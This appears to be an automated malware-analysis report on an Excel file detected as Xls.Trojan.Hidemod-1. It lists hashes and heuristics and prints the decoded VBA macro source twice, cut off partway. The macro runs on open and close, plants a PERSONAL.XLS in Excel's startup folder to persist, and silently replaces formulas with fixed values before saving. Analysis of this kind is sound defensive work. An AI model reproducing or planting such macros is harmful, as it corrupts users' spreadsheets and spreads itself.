Xls.Trojan.Hidemod-1 Office (OLE) malware analysis — malicious · d145d04b97b6308e

MALICIOUS

Office (OLE)

32.5 KB Created: 1998-10-02 15:14:54 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 3203912a03e133f6c18552d675d9bb3d SHA-1: 4d2b8ed648e69c5b6d3a9e4d8486080308edfb88 SHA-256: d145d04b97b6308e72e67439af88e692e170b90330ab8da5b9c2db02299aaa2e

160 Risk Score

Malware Insights

Xls.Trojan.Hidemod-1 · confidence 90%

MITRE ATT&CK

T1059.005 Visual Basic

This Excel file contains VBA macros, including Auto_Open and Auto_Close, which are indicative of malicious intent. The Auto_Open macro attempts to set up sheet activation and calculation event handlers, suggesting an effort to establish persistence or modify document behavior. The Auto_Close macro attempts to save the workbook after copying and pasting cell values, potentially to obfuscate changes or maintain a modified state. The ClamAV detection of 'Xls.Trojan.Hidemod-1' further supports the malicious classification.

Heuristics 4

ClamAV: Xls.Trojan.Hidemod-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Hidemod-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7404 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7404 bytes
SHA-256: `e6afd1d2ee25ff781dcbfeee9c90e7c09b32055c36b9b4df6c449f3d951b88bd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ModulV101" Option Explicit Private Const NameSheetV101 As String = "SheetV101" Private Const NameModulV101 As String = "ModulV101" Private Const DateV101 As String = "SheetV101!$A$33" Private Const PeriodDate As Date = 60 '========================== Sub Auto_open() Attribute Auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Dim Pz As Boolean ' Exit Sub '??????????????????????????? Application.ScreenUpdating = False On Error GoTo M Pz = CheckPers ThisWorkbook.OnSheetActivate = "HideModV101" If Range(DateV101).Value > Date Then GoTo M ThisWorkbook.OnCalculate = "ChangeCell" M: Application.ScreenUpdating = True End Sub '========================== Sub Auto_close() Attribute Auto_close.VB_ProcData.VB_Invoke_Func = " \n14" Dim x, y As Integer ' Exit Sub '??????????????????????????? Application.ScreenUpdating = False On Error GoTo M If Range(DateV101).Value > Date Then Exit Sub x = Cells.SpecialCells(xlLastCell).Row y = Cells.SpecialCells(xlLastCell).Column Range(Cells(1, 1), Cells(x, y)).Copy Range(Cells(1, 1), Cells(x, y)).PasteSpecial Paste:=xlValues ThisWorkbook.Save M: Application.ScreenUpdating = True End Sub '========================== Sub ChangeCell() Attribute ChangeCell.VB_ProcData.VB_Invoke_Func = " \n14" If Rnd < 0.7 Then Exit Sub On Error GoTo M Selection.Copy Selection.PasteSpecial Paste:=xlValues Application.CutCopyMode = False M: End Sub '=================== Private Function CheckPers() As Boolean Dim x As Integer Dim Pz As Boolean On Error GoTo M If ActiveWorkbook.Name = "PERSONAL.XLS" Then Application.OnWindow = "CheckV101" ActiveWindow.Visible = Not HideV101 CheckPers = True Exit Function End If For x = 1 To Application.Workbooks.Count If Application.Workbooks(x).Name = "PERSONAL.XLS" Then Pz = True Exit For End If Next x If Not Pz Then CreatePers CheckPers = Pz Exit Function M: Resume Next End Function '========== Private Function MMDir(ByVal NameDir As String) As Boolean On Error GoTo M1 MkDir NameDir MMDir = True Exit Function M1: MMDir = False End Function '===================== Private Function MakeMyDir(ByVal NameDir As String) As Boolean On Error GoTo M ChDir NameDir MakeMyDir = True Exit Function M: If MMDir(NameDir) Then MakeMyDir = True Else MakeMyDir = False End If End Function '=========================== Private Function FindDir(ByVal NameDir As String) As String Dim Ms As String Ms = NameDir M: If MakeMyDir(Ms) Then FindDir = Ms Exit Function End If Select Case Ms Case "c:\Windows\AltStart" '--------------------- Ms = "c:\Win95\AltStart" Case "c:\Win95\AltStart" '--------------------- Ms = "d:\Windows\AltStart" Case "d:\Windows\AltStart" '--------------------- Ms = "d:\Win95\AltStart" Case "d:\Win95\AltStart" '--------------------- Ms = "c:\AltStart" Case Else '--------------------- Ms = "c:\Windows\AltStart" End Select GoTo M End Function '========================= Private Function FindPers(ByVal NPath As String) As Boolean Dim MPN As String MPN = Trim(NPath) If MPN = "" Then FindPers = False Exit Function End If MPN = Trim(MPN) + "\PERSONAL.XLS" On Error GoTo M Date = FileDateTime(MPN) FindPers = True Exit Function M: If Err = 53 Then FindPers = False End If End Function '=================== Sub CreatePers() Attribute CreatePers.VB_ProcData.VB_Invoke_Func = " \n14" Dim BookNameOld, BookNameNew As String Dim MPathName, MPN As String Dim Pz As Boolean BookNameOld = ActiveWorkbook.Name MPathName = FindDir(Application.AltStartupPath) MPN = Trim(MPathName) + "\PERSONAL.XLS" I ... (truncated)

SHA-256: e6afd1d2ee25ff781dcbfeee9c90e7c09b32055c36b9b4df6c449f3d951b88bd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ModulV101"




































































































Option Explicit
Private Const NameSheetV101 As String = "SheetV101"
Private Const NameModulV101 As String = "ModulV101"
Private Const DateV101 As String = "SheetV101!$A$33"
Private Const PeriodDate As Date = 60
'==========================
Sub Auto_open()
Attribute Auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Pz As Boolean
'   Exit Sub      '???????????????????????????

  Application.ScreenUpdating = False
On Error GoTo M
  Pz = CheckPers
  ThisWorkbook.OnSheetActivate = "HideModV101"
  If Range(DateV101).Value > Date Then GoTo M
  ThisWorkbook.OnCalculate = "ChangeCell"
M:
  Application.ScreenUpdating = True
End Sub

'==========================
Sub Auto_close()
Attribute Auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
Dim x, y As Integer

'   Exit Sub      '???????????????????????????
  
  Application.ScreenUpdating = False
On Error GoTo M
  If Range(DateV101).Value > Date Then Exit Sub
   x = Cells.SpecialCells(xlLastCell).Row
   y = Cells.SpecialCells(xlLastCell).Column
   Range(Cells(1, 1), Cells(x, y)).Copy
   Range(Cells(1, 1), Cells(x, y)).PasteSpecial Paste:=xlValues
   ThisWorkbook.Save
M:
  Application.ScreenUpdating = True
End Sub
'==========================
Sub ChangeCell()
Attribute ChangeCell.VB_ProcData.VB_Invoke_Func = " \n14"
  If Rnd < 0.7 Then Exit Sub
On Error GoTo M
  Selection.Copy
  Selection.PasteSpecial Paste:=xlValues
  Application.CutCopyMode = False
M:
End Sub
'===================
Private Function CheckPers() As Boolean
Dim x As Integer
Dim Pz As Boolean

On Error GoTo M
  If ActiveWorkbook.Name = "PERSONAL.XLS" Then
    Application.OnWindow = "CheckV101"
    ActiveWindow.Visible = Not HideV101
    CheckPers = True
    Exit Function
  End If
  For x = 1 To Application.Workbooks.Count
    If Application.Workbooks(x).Name = "PERSONAL.XLS" Then
      Pz = True
      Exit For
    End If
  Next x
  If Not Pz Then CreatePers
  CheckPers = Pz
  Exit Function
M:
  Resume Next
End Function
'==========
Private Function MMDir(ByVal NameDir As String) As Boolean
  On Error GoTo M1
    MkDir NameDir
    MMDir = True
  Exit Function
M1:
    MMDir = False
End Function
'=====================
Private Function MakeMyDir(ByVal NameDir As String) As Boolean
  On Error GoTo M
    ChDir NameDir
    MakeMyDir = True
    Exit Function
M:
  If MMDir(NameDir) Then
    MakeMyDir = True
  Else
    MakeMyDir = False
  End If
End Function
'===========================
Private Function FindDir(ByVal NameDir As String) As String
Dim Ms As String

  Ms = NameDir
M:
  If MakeMyDir(Ms) Then
    FindDir = Ms
    Exit Function
  End If
  Select Case Ms
   Case "c:\Windows\AltStart" '---------------------
    Ms = "c:\Win95\AltStart"
   Case "c:\Win95\AltStart" '---------------------
    Ms = "d:\Windows\AltStart"
   Case "d:\Windows\AltStart" '---------------------
    Ms = "d:\Win95\AltStart"
   Case "d:\Win95\AltStart" '---------------------
    Ms = "c:\AltStart"
   Case Else '---------------------
    Ms = "c:\Windows\AltStart"
  End Select
GoTo M
End Function
'=========================
Private Function FindPers(ByVal NPath As String) As Boolean
Dim MPN As String

  MPN = Trim(NPath)
  If MPN = "" Then
    FindPers = False
    Exit Function
  End If
  
  MPN = Trim(MPN) + "\PERSONAL.XLS"
On Error GoTo M
  Date = FileDateTime(MPN)
  FindPers = True
  Exit Function
M:
  If Err = 53 Then
    FindPers = False
  End If
End Function
'===================
Sub CreatePers()
Attribute CreatePers.VB_ProcData.VB_Invoke_Func = " \n14"
  Dim BookNameOld, BookNameNew As String
  Dim MPathName, MPN As String
  Dim Pz As Boolean
    BookNameOld = ActiveWorkbook.Name
    MPathName = FindDir(Application.AltStartupPath)
    MPN = Trim(MPathName) + "\PERSONAL.XLS"
    I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.